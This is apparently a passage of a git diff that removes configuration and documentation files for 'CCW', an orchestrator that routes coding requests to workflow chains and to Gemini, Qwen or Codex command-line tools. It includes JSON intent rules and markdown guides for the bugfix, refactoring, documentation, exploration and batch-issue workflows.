"require_both": true,
"workflow": "issue:plan → issue:queue → issue:execute"
},
"exploration": {
"priority": 3,
"description": "探索/不确定意图",
"patterns": ["不确定", "不知道", "explore", "研究", "分析一下", "怎么做", "what if", "should i", "探索", "可能", "或许", "建议"],
"workflow": "brainstorm → plan → execute"
},
"ui_design": {
"priority": 4,
"description": "UI/设计意图",
"patterns": ["ui", "界面", "design", "设计", "component", "组件", "style", "样式", "layout", "布局", "前端", "frontend", "页面"],
"variants": {
"imitate": {
"triggers": ["参考", "模仿", "像", "类似", "reference", "like"],
"workflow": "ui-design:imitate-auto → plan → execute"
},
"explore": {
"triggers": [],
"workflow": "ui-design:explore-auto → plan → execute"
}
}
},
"tdd": {
"priority": 5,
"description": "测试驱动开发意图",
"patterns": ["tdd", "test-driven", "测试驱动", "先写测试", "red-green", "test first"],
"workflow": "tdd-plan → execute → tdd-verify"
},
"review": {
"priority": 6,
"description": "代码审查意图",
"patterns": ["review", "审查", "检查代码", "code review", "质量检查", "安全审查"],
"workflow": "review-session-cycle → review-fix"
},
"documentation": {
"priority": 7,
"description": "文档生成意图",
"patterns": ["文档", "documentation", "docs", "readme", "注释", "api doc", "说明"],
"variants": {
"incremental": {
"triggers": ["更新", "增量", "相关"],
"workflow": "memory:update-related"
},
"full": {
"triggers": ["全部", "完整", "所有"],
"workflow": "memory:docs → execute"
}
}
}
},
"complexity_indicators": {
"high": {
"score_threshold": 4,
"patterns": {
"architecture": {
"keywords": ["refactor", "重构", "migrate", "迁移", "architect", "架构", "system", "系统"],
"weight": 2
},
"multi_module": {
"keywords": ["multiple", "多个", "across", "跨", "all", "所有", "entire", "整个"],
"weight": 2
},
"integration": {
"keywords": ["integrate", "集成", "connect", "连接", "api", "database", "数据库"],
"weight": 1
},
"quality": {
"keywords": ["security", "安全", "performance", "性能", "scale", "扩展", "优化"],
"weight": 1
}
},
"workflow": "plan → verify → execute"
},
"medium": {
"score_threshold": 2,
"workflow": "lite-plan → lite-execute"
},
"low": {
"score_threshold": 0,
"workflow": "lite-plan → lite-execute"
}
},
"cli_tool_triggers": {
"gemini": {
"explicit": ["用 gemini", "gemini 分析", "让 gemini", "用gemini"],
"semantic": ["深度分析", "架构理解", "执行流追踪", "根因分析"]
},
"qwen": {
"explicit": ["用 qwen", "qwen 评估", "让 qwen", "用qwen"],
"semantic": ["第二视角", "对比验证", "模式识别"]
},
"codex": {
"explicit": ["用 codex", "codex 实现", "让 codex", "用codex"],
"semantic": ["自主完成", "批量修改", "自动实现"]
}
},
"fallback_rules": {
"no_match": {
"default_workflow": "lite-plan → lite-execute",
"use_complexity_assessment": true
},
"ambiguous": {
"action": "ask_user",
"message": "检测到多个可能意图,请确认工作流选择"
}
}
}


@@ -1,451 +0,0 @@
{
"_metadata": {
"version": "1.1.0",
"description": "Predefined workflow chains with CLI tool integration for CCW orchestration"
},
"cli_tools": {
"_doc": "CLI工具是CCW的核心能力在合适时机自动调用以获得1)较少token获取大量上下文 2)引入不同模型视角 3)增强debug和规划能力",
"gemini": {
"strengths": ["超长上下文", "深度分析", "架构理解", "执行流追踪"],
"triggers": ["分析", "理解", "设计", "架构", "评估", "诊断"],
"mode": "analysis",
"token_efficiency": "high",
"use_when": [
"需要理解大型代码库结构",
"执行流追踪和数据流分析",
"架构设计和技术方案评估",
"复杂问题诊断root cause analysis"
]
},
"qwen": {
"strengths": ["超长上下文", "代码模式识别", "多维度分析"],
"triggers": ["评估", "对比", "验证"],
"mode": "analysis",
"token_efficiency": "high",
"use_when": [
"Gemini 不可用时作为备选",
"需要第二视角验证分析结果",
"代码模式识别和重复检测"
]
},
"codex": {
"strengths": ["精确代码生成", "自主执行", "数学推理"],
"triggers": ["实现", "重构", "修复", "生成", "测试"],
"mode": "write",
"token_efficiency": "medium",
"use_when": [
"需要自主完成多步骤代码修改",
"复杂重构和迁移任务",
"测试生成和修复循环"
]
}
},
"cli_injection_rules": {
"_doc": "隐式规则在特定条件下自动注入CLI调用",
"context_gathering": {
"trigger": "file_read >= 50k chars OR module_count >= 5",
"inject": "gemini --mode analysis",
"reason": "大量代码上下文使用CLI可节省主会话token"
},
"pre_planning_analysis": {
"trigger": "complexity === 'high' OR intent === 'exploration'",
"inject": "gemini --mode analysis",
"reason": "复杂任务先用CLI分析获取多模型视角"
},
"debug_diagnosis": {
"trigger": "intent === 'bugfix' AND root_cause_unclear",
"inject": "gemini --mode analysis",
"reason": "深度诊断利用Gemini的执行流追踪能力"
},
"code_review": {
"trigger": "step === 'review'",
"inject": "gemini --mode analysis",
"reason": "代码审查用CLI减少token占用"
},
"implementation": {
"trigger": "step === 'execute' AND task_count >= 3",
"inject": "codex --mode write",
"reason": "多任务执行用Codex自主完成"
}
},
"chains": {
"rapid": {
"name": "Rapid Iteration",
"description": "多模型协作分析 + 直接执行",
"complexity": ["low", "medium"],
"steps": [
{
"command": "/workflow:lite-plan",
"optional": false,
"auto_continue": true,
"cli_hint": {
"explore_phase": { "tool": "gemini", "mode": "analysis", "trigger": "needs_exploration" },
"planning_phase": { "tool": "gemini", "mode": "analysis", "trigger": "complexity >= medium" }
}
},
{
"command": "/workflow:lite-execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"execution": { "tool": "codex", "mode": "write", "trigger": "user_selects_codex OR complexity >= medium" },
"review": { "tool": "gemini", "mode": "analysis", "trigger": "user_selects_review" }
}
}
],
"total_steps": 2,
"estimated_time": "15-45 min"
},
"full": {
"name": "Full Exploration",
"description": "多模型深度分析 + 头脑风暴 + 规划 + 执行",
"complexity": ["medium", "high"],
"steps": [
{
"command": "/workflow:brainstorm:auto-parallel",
"optional": false,
"confirm_before": true,
"cli_hint": {
"role_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
}
},
{
"command": "/workflow:plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"context_gather": { "tool": "gemini", "mode": "analysis", "trigger": "always" },
"task_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
},
{ "command": "/workflow:action-plan-verify", "optional": true, "auto_continue": true },
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"execution": { "tool": "codex", "mode": "write", "trigger": "task_count >= 3" }
}
}
],
"total_steps": 4,
"estimated_time": "1-3 hours"
},
"coupled": {
"name": "Coupled Planning",
"description": "CLI深度分析 + 完整规划 + 验证 + 执行",
"complexity": ["high"],
"steps": [
{
"command": "/workflow:plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"pre_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "架构理解和依赖分析" },
"conflict_detection": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
},
{ "command": "/workflow:action-plan-verify", "optional": false, "auto_continue": true },
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "自主多任务执行" }
}
},
{
"command": "/workflow:review",
"optional": true,
"auto_continue": false,
"cli_hint": {
"review": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
}
],
"total_steps": 4,
"estimated_time": "2-4 hours"
},
"bugfix": {
"name": "Bug Fix",
"description": "CLI诊断 + 智能修复",
"complexity": ["low", "medium"],
"variants": {
"standard": {
"steps": [
{
"command": "/workflow:lite-fix",
"optional": false,
"auto_continue": true,
"cli_hint": {
"diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "purpose": "根因分析和执行流追踪" },
"fix": { "tool": "codex", "mode": "write", "trigger": "severity >= medium" }
}
}
]
},
"hotfix": {
"steps": [
{
"command": "/workflow:lite-fix --hotfix",
"optional": false,
"auto_continue": true,
"cli_hint": {
"quick_diagnosis": { "tool": "gemini", "mode": "analysis", "trigger": "always", "timeout": "60s" }
}
}
]
}
},
"total_steps": 1,
"estimated_time": "10-30 min"
},
"issue": {
"name": "Issue Batch",
"description": "CLI批量分析 + 队列优化 + 并行执行",
"complexity": ["medium", "high"],
"steps": [
{
"command": "/issue:plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"solution_generation": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
}
},
{
"command": "/issue:queue",
"optional": false,
"auto_continue": false,
"cli_hint": {
"conflict_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "issue_count >= 3" }
}
},
{
"command": "/issue:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"batch_execution": { "tool": "codex", "mode": "write", "trigger": "always", "purpose": "DAG并行执行" }
}
}
],
"total_steps": 3,
"estimated_time": "1-4 hours"
},
"tdd": {
"name": "Test-Driven Development",
"description": "TDD规划 + 执行 + CLI验证",
"complexity": ["medium", "high"],
"steps": [
{
"command": "/workflow:tdd-plan",
"optional": false,
"auto_continue": false,
"cli_hint": {
"test_strategy": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
},
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"red_green_refactor": { "tool": "codex", "mode": "write", "trigger": "always" }
}
},
{
"command": "/workflow:tdd-verify",
"optional": false,
"auto_continue": false,
"cli_hint": {
"coverage_analysis": { "tool": "gemini", "mode": "analysis", "trigger": "always" }
}
}
],
"total_steps": 3,
"estimated_time": "1-3 hours"
},
"ui": {
"name": "UI-First Development",
"description": "UI设计 + 规划 + 执行",
"complexity": ["medium", "high"],
"variants": {
"explore": {
"steps": [
{ "command": "/workflow:ui-design:explore-auto", "optional": false, "auto_continue": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
]
},
"imitate": {
"steps": [
{ "command": "/workflow:ui-design:imitate-auto", "optional": false, "auto_continue": false },
{ "command": "/workflow:ui-design:design-sync", "optional": false, "auto_continue": true },
{ "command": "/workflow:plan", "optional": false, "auto_continue": false },
{ "command": "/workflow:execute", "optional": false, "auto_continue": false }
]
}
},
"total_steps": 4,
"estimated_time": "2-4 hours"
},
"review-fix": {
"name": "Review and Fix",
"description": "CLI多维审查 + 自动修复",
"complexity": ["medium"],
"steps": [
{
"command": "/workflow:review-session-cycle",
"optional": false,
"auto_continue": false,
"cli_hint": {
"multi_dimension_review": { "tool": "gemini", "mode": "analysis", "trigger": "always", "parallel": true }
}
},
{
"command": "/workflow:review-fix",
"optional": true,
"auto_continue": false,
"cli_hint": {
"auto_fix": { "tool": "codex", "mode": "write", "trigger": "findings_count >= 3" }
}
}
],
"total_steps": 2,
"estimated_time": "30-90 min"
},
"docs": {
"name": "Documentation",
"description": "CLI批量文档生成",
"complexity": ["low", "medium"],
"variants": {
"incremental": {
"steps": [
{
"command": "/memory:update-related",
"optional": false,
"auto_continue": false,
"cli_hint": {
"doc_generation": { "tool": "gemini", "mode": "write", "trigger": "module_count >= 5" }
}
}
]
},
"full": {
"steps": [
{ "command": "/memory:docs", "optional": false, "auto_continue": false },
{
"command": "/workflow:execute",
"optional": false,
"auto_continue": false,
"cli_hint": {
"batch_doc": { "tool": "gemini", "mode": "write", "trigger": "always" }
}
}
]
}
},
"total_steps": 2,
"estimated_time": "15-60 min"
},
"cli-analysis": {
"name": "CLI Direct Analysis",
"description": "直接CLI分析获取多模型视角节省主会话token",
"complexity": ["low", "medium", "high"],
"standalone": true,
"steps": [
{
"command": "ccw cli",
"tool": "gemini",
"mode": "analysis",
"optional": false,
"auto_continue": false
}
],
"use_cases": [
"大型代码库快速理解",
"执行流追踪和数据流分析",
"架构评估和技术方案对比",
"性能瓶颈诊断"
],
"total_steps": 1,
"estimated_time": "5-15 min"
},
"cli-implement": {
"name": "CLI Direct Implementation",
"description": "直接Codex实现自主完成多步骤任务",
"complexity": ["medium", "high"],
"standalone": true,
"steps": [
{
"command": "ccw cli",
"tool": "codex",
"mode": "write",
"optional": false,
"auto_continue": false
}
],
"use_cases": [
"明确需求的功能实现",
"代码重构和迁移",
"测试生成",
"批量代码修改"
],
"total_steps": 1,
"estimated_time": "15-60 min"
},
"cli-debug": {
"name": "CLI Debug Session",
"description": "CLI调试会话利用Gemini深度诊断能力",
"complexity": ["medium", "high"],
"standalone": true,
"steps": [
{
"command": "ccw cli",
"tool": "gemini",
"mode": "analysis",
"purpose": "hypothesis-driven debugging",
"optional": false,
"auto_continue": false
}
],
"use_cases": [
"复杂bug根因分析",
"执行流异常追踪",
"状态机错误诊断",
"并发问题排查"
],
"total_steps": 1,
"estimated_time": "10-30 min"
}
},
"chain_selection_rules": {
"intent_mapping": {
"bugfix": ["bugfix"],
"feature_simple": ["rapid"],
"feature_unclear": ["full"],
"feature_complex": ["coupled"],
"issue_batch": ["issue"],
"test_driven": ["tdd"],
"ui_design": ["ui"],
"code_review": ["review-fix"],
"documentation": ["docs"],
"analysis_only": ["cli-analysis"],
"implement_only": ["cli-implement"],
"debug": ["cli-debug", "bugfix"]
},
"complexity_fallback": {
"low": "rapid",
"medium": "coupled",
"high": "full"
},
"cli_preference_rules": {
"_doc": "用户语义触发CLI工具选择",
"gemini_triggers": ["用 gemini", "gemini 分析", "让 gemini", "深度分析", "架构理解"],
"qwen_triggers": ["用 qwen", "qwen 评估", "让 qwen", "第二视角"],
"codex_triggers": ["用 codex", "codex 实现", "让 codex", "自主完成", "批量修改"]
}
}
}


@@ -1,218 +0,0 @@
# Action: Bugfix Workflow
Bug fix workflow: intelligent diagnosis + impact assessment + fix
## Pattern
```
lite-fix [--hotfix]
```
## Trigger Conditions
- Keywords: "fix", "bug", "error", "crash", "broken", "fail", "修复", "报错"
- Problem symptoms described
- Error messages present
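The trigger check above can be sketched as a keyword match. This is a minimal illustration, not the orchestrator's actual implementation; `matchesBugfix` and the keyword list are hypothetical names copied from the conditions listed here.

```javascript
// Hypothetical sketch: keyword-based bugfix trigger detection.
// The keyword list mirrors the Trigger Conditions above.
const BUGFIX_KEYWORDS = ['fix', 'bug', 'error', 'crash', 'broken', 'fail', '修复', '报错'];

function matchesBugfix(request) {
  const text = request.toLowerCase();
  // Any single keyword hit classifies the request as a bugfix candidate.
  return BUGFIX_KEYWORDS.some((keyword) => text.includes(keyword));
}
```

In practice a classifier would also weigh the other signals (problem symptoms, error messages) rather than rely on keywords alone.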
## Execution Flow
### Standard Mode
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant LF as lite-fix
participant CLI as CLI Tools
U->>O: Bug description
O->>O: Classify: bugfix (standard)
O->>LF: /workflow:lite-fix "bug"
Note over LF: Phase 1: Diagnosis
LF->>CLI: Root cause analysis (Gemini)
CLI-->>LF: diagnosis.json
Note over LF: Phase 2: Impact Assessment
LF->>LF: Risk scoring (0-10)
LF->>LF: Severity classification
LF-->>U: Impact report
Note over LF: Phase 3: Fix Strategy
LF->>LF: Generate fix options
LF-->>U: Present strategies
U->>LF: Select strategy
Note over LF: Phase 4: Verification Plan
LF->>LF: Generate test plan
LF-->>U: Verification approach
Note over LF: Phase 5: Confirmation
LF->>U: Execution method?
U->>LF: Confirm
Note over LF: Phase 6: Execute
LF->>CLI: Execute fix (Agent/Codex)
CLI-->>LF: Results
LF-->>U: Fix complete
```
### Hotfix Mode
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant LF as lite-fix
participant CLI as CLI Tools
U->>O: Urgent bug + "hotfix"
O->>O: Classify: bugfix (hotfix)
O->>LF: /workflow:lite-fix --hotfix "bug"
Note over LF: Minimal Diagnosis
LF->>CLI: Quick root cause
CLI-->>LF: Known issue?
Note over LF: Surgical Fix
LF->>LF: Single optimal fix
LF-->>U: Quick confirmation
U->>LF: Proceed
Note over LF: Smoke Test
LF->>CLI: Minimal verification
CLI-->>LF: Pass/Fail
Note over LF: Follow-up Generation
LF->>LF: Generate follow-up tasks
LF-->>U: Fix deployed + follow-ups created
```
## When to Use
### Standard Mode (/workflow:lite-fix)
**Use for**:
- Bugs with known symptoms
- Localized fixes (1-5 files)
- Non-urgent issues
- Full diagnosis required
### Hotfix Mode (/workflow:lite-fix --hotfix)
**Use for**:
- Production incidents
- Emergency fixes
- Clear single-point failures
- Time-sensitive situations
**Don't use** (for either mode):
- Architectural changes required → `/workflow:plan --mode bugfix`
- Multiple related issues → `/issue:plan`
## Severity Classification
| Score | Severity | Response | Verification |
|-------|----------|----------|--------------|
| 8-10 | Critical | Immediate | Smoke test only |
| 6-7.9 | High | Fast track | Integration tests |
| 4-5.9 | Medium | Normal | Full test suite |
| 0-3.9 | Low | Scheduled | Comprehensive |
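The score-to-severity mapping in the table can be expressed directly in code. This is a minimal sketch; `classifySeverity` is a hypothetical helper whose thresholds are taken from the Score column above.

```javascript
// Hypothetical sketch of the severity table: map a 0-10 risk score
// to severity, response speed, and verification level.
function classifySeverity(score) {
  if (score >= 8) return { severity: 'Critical', response: 'Immediate', verification: 'smoke' };
  if (score >= 6) return { severity: 'High', response: 'Fast track', verification: 'integration' };
  if (score >= 4) return { severity: 'Medium', response: 'Normal', verification: 'full' };
  return { severity: 'Low', response: 'Scheduled', verification: 'comprehensive' };
}
```

Note how the verification level relaxes as severity rises: a Critical fix ships after a smoke test only, with thorough testing deferred to follow-up tasks.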
## Configuration
```javascript
const bugfixConfig = {
standard: {
diagnosis: {
tool: 'gemini',
depth: 'comprehensive',
timeout: 300000 // 5 min
},
impact: {
riskThreshold: 6.0, // High risk threshold
autoEscalate: true
},
verification: {
levels: ['smoke', 'integration', 'full'],
autoSelect: true // Based on severity
}
},
hotfix: {
diagnosis: {
tool: 'gemini',
depth: 'minimal',
timeout: 60000 // 1 min
},
fix: {
strategy: 'single', // Single optimal fix
surgical: true
},
followup: {
generate: true,
types: ['comprehensive-fix', 'post-mortem']
}
}
}
```
## Example Invocations
```bash
# Standard bug fix
ccw "用户头像上传失败,返回 413 错误"
→ lite-fix
→ Diagnosis: File size limit in nginx
→ Impact: 6.5 (High)
→ Fix: Update nginx config + add client validation
→ Verify: Integration test
# Production hotfix
ccw "紧急:支付网关返回 5xx 错误,影响所有用户"
→ lite-fix --hotfix
→ Quick diagnosis: API key expired
→ Surgical fix: Rotate key
→ Smoke test: Payment flow
→ Follow-ups: Key rotation automation, monitoring alert
# Unknown root cause
ccw "Shopping cart randomly loses items, cause unknown"
→ lite-fix
→ Deep diagnosis (auto)
→ Root cause: Race condition in concurrent updates
→ Fix: Add optimistic locking
→ Verify: Concurrent test suite
```
## Output Artifacts
```
.workflow/.lite-fix/{bug-slug}-{timestamp}/
├── diagnosis.json # Root cause analysis
├── impact.json # Risk assessment
├── fix-plan.json # Fix strategy
├── task.json # Enhanced task for execution
└── followup.json # Follow-up tasks (hotfix only)
```
## Follow-up Tasks (Hotfix Mode)
```json
{
"followups": [
{
"id": "FOLLOWUP-001",
"type": "comprehensive-fix",
"title": "Complete fix for payment gateway issue",
"due": "3 days",
"description": "Implement full solution with proper error handling"
},
{
"id": "FOLLOWUP-002",
"type": "post-mortem",
"title": "Post-mortem analysis",
"due": "1 week",
"description": "Document incident and prevention measures"
}
]
}
```
@@ -1,194 +0,0 @@
# Action: Coupled Workflow
Complex coupled workflow: full planning + verification + execution
## Pattern
```
plan → action-plan-verify → execute
```
## Trigger Conditions
- Complexity: High
- Keywords: "refactor", "重构", "migrate", "迁移", "architect", "架构"
- Cross-module changes
- System-level modifications
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant PL as plan
participant VF as verify
participant EX as execute
participant RV as review
U->>O: Complex task
O->>O: Classify: coupled (high complexity)
Note over PL: Phase 1: Comprehensive Planning
O->>PL: /workflow:plan
PL->>PL: Multi-phase planning
PL->>PL: Generate IMPL_PLAN.md
PL->>PL: Generate task JSONs
PL-->>U: Present plan
Note over VF: Phase 2: Verification
U->>VF: /workflow:action-plan-verify
VF->>VF: Cross-artifact consistency
VF->>VF: Dependency validation
VF->>VF: Quality gate checks
VF-->>U: Verification report
alt Verification failed
U->>PL: Replan with issues
else Verification passed
Note over EX: Phase 3: Execution
U->>EX: /workflow:execute
EX->>EX: DAG-based parallel execution
EX-->>U: Execution complete
end
Note over RV: Phase 4: Review
U->>RV: /workflow:review
RV-->>U: Review findings
```
## When to Use
**Ideal scenarios**:
- Large-scale refactoring
- Architecture migrations
- Cross-module feature development
- Tech stack upgrades
- Team collaboration projects
**Avoid when**:
- Simple localized changes
- Tight deadlines
- Small independent features
## Verification Checks
| Check | Description | Severity |
|-------|-------------|----------|
| Dependency Cycles | Detect circular dependencies | Critical |
| Missing Tasks | Plan diverges from actual tasks | High |
| File Conflicts | Multiple tasks modify the same file | Medium |
| Coverage Gaps | Requirements not covered | Medium |
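The Dependency Cycles check can be sketched as a depth-first search over `depends_on` edges (a simplified stand-in for the actual verifier; `findCycle` is a hypothetical name):

```javascript
// Detect circular dependencies among task JSONs ({ id, depends_on }).
// Returns the first cycle found as an array of ids, or null if acyclic.
function findCycle(tasks) {
  const deps = new Map(tasks.map(t => [t.id, t.depends_on || []]))
  const state = new Map() // id -> 'visiting' | 'done'
  const stack = []        // current DFS path
  function visit(id) {
    if (state.get(id) === 'done') return null
    if (state.get(id) === 'visiting') return stack.slice(stack.indexOf(id))
    state.set(id, 'visiting')
    stack.push(id)
    for (const dep of deps.get(id) || []) {
      const cycle = visit(dep)
      if (cycle) return cycle
    }
    stack.pop()
    state.set(id, 'done')
    return null
  }
  for (const t of tasks) {
    const cycle = visit(t.id)
    if (cycle) return cycle
  }
  return null
}
```

A non-null result maps directly to a Critical finding in the verification report.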
## Configuration
```javascript
const coupledConfig = {
plan: {
phases: 5, // Full 5-phase planning
taskGeneration: 'action-planning-agent',
outputFormat: {
implPlan: '.workflow/plans/IMPL_PLAN.md',
taskJsons: '.workflow/tasks/IMPL-*.json'
}
},
verify: {
required: true, // Always verify before execute
autoReplan: false, // Manual replan on failure
qualityGates: ['no-cycles', 'no-conflicts', 'complete-coverage']
},
execute: {
dagParallel: true,
checkpointInterval: 3, // Checkpoint every 3 tasks
rollbackOnFailure: true
},
review: {
types: ['architecture', 'security'],
required: true
}
}
```
## Task JSON Structure
```json
{
"id": "IMPL-001",
"title": "Refactor auth module core logic",
"scope": "src/auth/**",
"action": "refactor",
"depends_on": [],
"modification_points": [
{
"file": "src/auth/service.ts",
"target": "AuthService",
"change": "Extract OAuth2 logic"
}
],
"acceptance": [
"All existing tests pass",
"OAuth2 flow works"
]
}
```
## Example Invocations
```bash
# Architecture refactoring
ccw "Refactor the entire auth module, migrating from sessions to JWT"
→ plan (5 phases)
→ verify
→ execute
# System migration
ccw "Migrate the database from MySQL to PostgreSQL"
→ plan (migration strategy)
→ verify (data integrity checks)
→ execute (staged migration)
# Cross-module feature
ccw "Implement cross-service distributed transaction support"
→ plan (architectural design)
→ verify (consistency checks)
→ execute (incremental rollout)
```
## Output Artifacts
```
.workflow/
├── plans/
│ └── IMPL_PLAN.md # Comprehensive plan
├── tasks/
│ ├── IMPL-001.json
│ ├── IMPL-002.json
│ └── ...
├── verify/
│ └── verification-report.md # Verification results
└── reviews/
└── {review-type}.md # Review findings
```
## Replan Flow
When verification fails:
```javascript
if (verificationResult.status === 'failed') {
console.log(`
## Verification Failed
**Issues found**:
${verificationResult.issues.map(i => `- ${i.severity}: ${i.message}`).join('\n')}
**Options**:
1. /workflow:replan - Address issues and regenerate plan
2. /workflow:plan --force - Proceed despite issues (not recommended)
3. Review issues manually and fix plan files
`)
}
```
@@ -1,93 +0,0 @@
# Documentation Workflow Action
## Pattern
```
memory:docs → execute (full)
memory:update-related (incremental)
```
## Trigger Conditions
- Keywords: "文档", "documentation", "docs", "readme", "注释"
- Variant triggers:
- `incremental`: "更新", "增量", "相关"
- `full`: "全部", "完整", "所有"
## Variants
### Full Documentation
```mermaid
graph TD
A[User Input] --> B[memory:docs]
B --> C[Project structure analysis]
C --> D[Module grouping ≤10/task]
D --> E[execute: parallel generation]
E --> F[README.md]
E --> G[ARCHITECTURE.md]
E --> H[API Docs]
E --> I[Module CLAUDE.md]
```
### Incremental Update
```mermaid
graph TD
A[Git Changes] --> B[memory:update-related]
B --> C[Changed module detection]
C --> D[Locate related docs]
D --> E[Incremental update]
```
## Configuration
| Parameter | Default | Description |
|------|--------|------|
| batch_size | 4 | Modules per agent |
| format | markdown | Output format |
| include_api | true | Generate API docs |
| include_diagrams | true | Generate Mermaid diagrams |
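A minimal sketch of how `batch_size` could drive module grouping (hypothetical helper; assumes modules are plain path strings):

```javascript
// Split a module list into per-agent batches of at most batchSize modules.
function groupModules(modules, batchSize = 4) {
  const groups = []
  for (let i = 0; i < modules.length; i += batchSize) {
    groups.push(modules.slice(i, i + batchSize))
  }
  return groups
}

groupModules(['src/auth', 'src/api', 'src/db', 'src/ui', 'src/cli'])
// → [['src/auth', 'src/api', 'src/db', 'src/ui'], ['src/cli']]
```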
## CLI Integration
| Phase | CLI Hint | Purpose |
|------|----------|------|
| memory:docs | `gemini --mode analysis` | Project structure analysis |
| execute | `gemini --mode write` | Doc generation |
| update-related | `gemini --mode write` | Incremental updates |
## Slash Commands
```bash
/memory:docs              # Plan full doc generation
/memory:docs-full-cli     # Run full doc generation via CLI
/memory:docs-related-cli  # Run incremental doc generation via CLI
/memory:update-related    # Update docs related to recent changes
/memory:update-full       # Update all CLAUDE.md files
```
## Output Structure
```
project/
├── README.md # Project overview
├── ARCHITECTURE.md # Architecture doc
├── docs/
│ └── api/ # API docs
└── src/
└── module/
└── CLAUDE.md # Module doc
```
## When to Use
- Initial documentation for a new project
- Documentation refresh before a major release
- Syncing docs after code changes
- API documentation generation
## Risk Assessment
| Risk | Mitigation |
|------|----------|
| Docs drift out of sync with code | git hook integration |
| Generated content too verbose | Controlled via batch_size |
| Important modules missed | Full-scan verification |
@@ -1,154 +0,0 @@
# Action: Full Workflow
Full exploration workflow: analysis + brainstorming + planning + execution
## Pattern
```
brainstorm:auto-parallel → plan → [verify] → execute
```
## Trigger Conditions
- Intent: Exploration (uncertainty detected)
- Keywords: "不确定", "不知道", "explore", "怎么做", "what if"
- No clear implementation path
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant BS as brainstorm
participant PL as plan
participant VF as verify
participant EX as execute
U->>O: Unclear task
O->>O: Classify: full
Note over BS: Phase 1: Brainstorm
O->>BS: /workflow:brainstorm:auto-parallel
BS->>BS: Multi-role parallel analysis
BS->>BS: Synthesis & recommendations
BS-->>U: Present options
U->>BS: Select direction
Note over PL: Phase 2: Plan
BS->>PL: /workflow:plan
PL->>PL: Generate IMPL_PLAN.md
PL->>PL: Generate task JSONs
PL-->>U: Review plan
Note over VF: Phase 3: Verify (optional)
U->>VF: /workflow:action-plan-verify
VF->>VF: Cross-artifact consistency
VF-->>U: Verification report
Note over EX: Phase 4: Execute
U->>EX: /workflow:execute
EX->>EX: DAG-based parallel execution
EX-->>U: Execution complete
```
## When to Use
**Ideal scenarios**:
- Product direction exploration
- Technology selection evaluation
- Architecture design decisions
- Complex feature planning
- Multi-role perspectives needed
**Avoid when**:
- Task is clear and simple
- Tight deadlines
- A mature solution already exists
## Brainstorm Roles
| Role | Focus | Typical Questions |
|------|-------|-------------------|
| Product Manager | User value, market positioning | "What are the user pain points?" |
| System Architect | Technical approach, architecture design | "How do we ensure scalability?" |
| UX Expert | User experience, interaction design | "Is the user flow smooth?" |
| Security Expert | Security risks, compliance | "What are the security risks?" |
| Data Architect | Data model, storage strategy | "How should data be organized?" |
## Configuration
```javascript
const fullConfig = {
brainstorm: {
defaultRoles: ['product-manager', 'system-architect', 'ux-expert'],
maxRoles: 5,
synthesis: true // Always generate synthesis
},
plan: {
verifyBeforeExecute: true, // Recommend verification
taskFormat: 'json' // Generate task JSONs
},
execute: {
dagParallel: true, // DAG-based parallel execution
testGeneration: 'optional' // Suggest test-gen after
}
}
```
## Continuation Points
After each phase, CCW can continue to the next:
```javascript
// After brainstorm completes
console.log(`
## Brainstorm Complete
**Next steps**:
1. /workflow:plan "Plan implementation based on brainstorm results"
2. Or refine: /workflow:brainstorm:synthesis
`)
// After plan completes
console.log(`
## Plan Complete
**Next steps**:
1. /workflow:action-plan-verify (recommended)
2. /workflow:execute (execute directly)
`)
```
## Example Invocations
```bash
# Product exploration
ccw "I want to build a team collaboration tool but am unsure of the direction"
→ brainstorm:auto-parallel (5 roles)
→ plan
→ execute
# Technical exploration
ccw "How should I design a highly available message queue system?"
→ brainstorm:auto-parallel (system-architect, data-architect)
→ plan
→ verify
→ execute
```
## Output Artifacts
```
.workflow/
├── brainstorm/
│ ├── {session}/
│ │ ├── role-{role}.md
│ │ └── synthesis.md
├── plans/
│ └── IMPL_PLAN.md
└── tasks/
└── IMPL-*.json
```
@@ -1,201 +0,0 @@
# Action: Issue Workflow
Batch issue workflow: planning + queueing + batch execution
## Pattern
```
issue:plan → issue:queue → issue:execute
```
## Trigger Conditions
- Keywords: "issues", "batch", "queue", "多个", "批量"
- Multiple related problems
- Long-running fix campaigns
- Priority-based processing needed
## Execution Flow
```mermaid
sequenceDiagram
participant U as User
participant O as CCW Orchestrator
participant IP as issue:plan
participant IQ as issue:queue
participant IE as issue:execute
U->>O: Multiple issues / batch fix
O->>O: Classify: issue
Note over IP: Phase 1: Issue Planning
O->>IP: /issue:plan
IP->>IP: Load unplanned issues
IP->>IP: Generate solutions per issue
IP->>U: Review solutions
U->>IP: Bind selected solutions
Note over IQ: Phase 2: Queue Formation
IP->>IQ: /issue:queue
IQ->>IQ: Conflict analysis
IQ->>IQ: Priority calculation
IQ->>IQ: DAG construction
IQ->>U: High-severity conflicts?
U->>IQ: Resolve conflicts
IQ->>IQ: Generate execution queue
Note over IE: Phase 3: Execution
IQ->>IE: /issue:execute
IE->>IE: DAG-based parallel execution
IE->>IE: Per-solution progress tracking
IE-->>U: Batch execution complete
```
## When to Use
